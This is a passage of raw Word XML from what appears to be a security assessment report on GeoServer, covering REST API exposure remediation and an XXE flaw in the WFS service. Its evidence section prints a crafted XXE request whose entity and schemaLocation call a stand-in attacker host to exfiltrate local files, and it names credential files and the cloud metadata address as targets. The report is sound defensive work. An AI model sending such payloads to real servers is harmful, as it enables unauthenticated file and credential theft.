      <w:r>
        <w:t>gwc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rest.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gwc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/rest/**, then restart </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict network access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> REST API endpoints at the firewall or load-balancer level, limiting access to trusted IP ranges where operationally appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable and review </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access logs for requests to /rest.html, /rest.xml, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rest.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, and similar patterns to detect prior or ongoing reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Required Fix Time Estimation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Planned — within next patching cycle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://github.com/geoserver/geoserver/security/advisories/GHSA-h86g-x8mm-78m5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://osgeo-org.atlassian.net/browse/GEOS-11664</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://www.cvedetails.com/cve/CVE-2025-27505/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.2  XML</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> External Entity (XXE) Injection via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WFS Service (CVE-2025-30220)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2025-30220 is a high-severity XML External Entity (XXE) processing vulnerability (CWE-611) affecting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Web Feature Service (WFS) endpoint. The vulnerability originates in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> library's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-core Schemas class, which uses the Eclipse XSD library to build in-memory XSD schema representations. When processing XML documents that reference an external XML schema (via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xsi:schemaLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attribute), the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> library fails to apply the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EntityResolver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configured by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ParserHandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This means that even when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is configured with an ENTITY_RESOLUTION_ALLOWLIST to restrict external entity resolution, that restriction is bypassed during XSD schema processing. An attacker can supply a crafted WFS request containing a malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xsi:schemaLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attribute that references an external DTD or schema </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">under the attacker's control. When </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> processes the request, it fetches the external resource, enabling two distinct attack primitives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Out-of-Band (OOB) Data Exfiltration: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process can be forced to read local files accessible by its OS user and exfiltrate their contents to an attacker-controlled server, including sensitive configuration files, credentials, and system files such as /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/passwd, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>application.properties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> own data directory configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF): </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can be made to issue HTTP requests to arbitrary internal or external URLs, potentially exposing internal network services, cloud metadata endpoints (e.g., AWS Instance Metadata Service at 169.254.169.254), or other backend systems not directly accessible to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This vulnerability is exploitable without authentication, making it particularly severe in externally exposed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> deployments. A CVSS v3.1 score of 9.9 (Critical) has been assigned to this vulnerability.</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6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0000"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity: High</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Impact: High</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Likelihood: Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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B21669" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Affected Hosts / URLs</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geoserver</w:t>
            </w:r>
            <w:proofErr w:type="spell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wfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xsi:schemaLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> parameter)</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geoserver</w:t>
            </w:r>
            <w:proofErr w:type="spell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ows</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
        <w:ind w:left="720" w:right="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Screenshot: XXE payload sent to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>geoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xsi:schemaLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> referencing attacker-controlled server — showing OOB callback received / file content exfiltrated]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example of a crafted WFS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> request triggering the XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="100" w:after="160"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>geoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1 Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xml  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?xml version="1.0" encoding="UTF-8"?&gt; &lt;!DOCTYPE foo [   &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://attacker.com/malicious.dtd"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wfs:GetFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xmlns:wfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">"..."  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xmlns</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:xsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">="..."    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xsi:schemaLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>="http://attacker.com/evil.xsd"&gt;   ... &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wfs:GetFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack &amp; Risk Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An external attacker who identifies a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WFS endpoint can exploit CVE-2025-30220 without any credentials to conduct the following attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credential Theft: By triggering OOB file exfiltration of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> data directory configuration files (e.g., security/masterpw.info, web/demo/*, or application server configuration files), an attacker may recover plaintext or weakly protected credentials that can be used for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
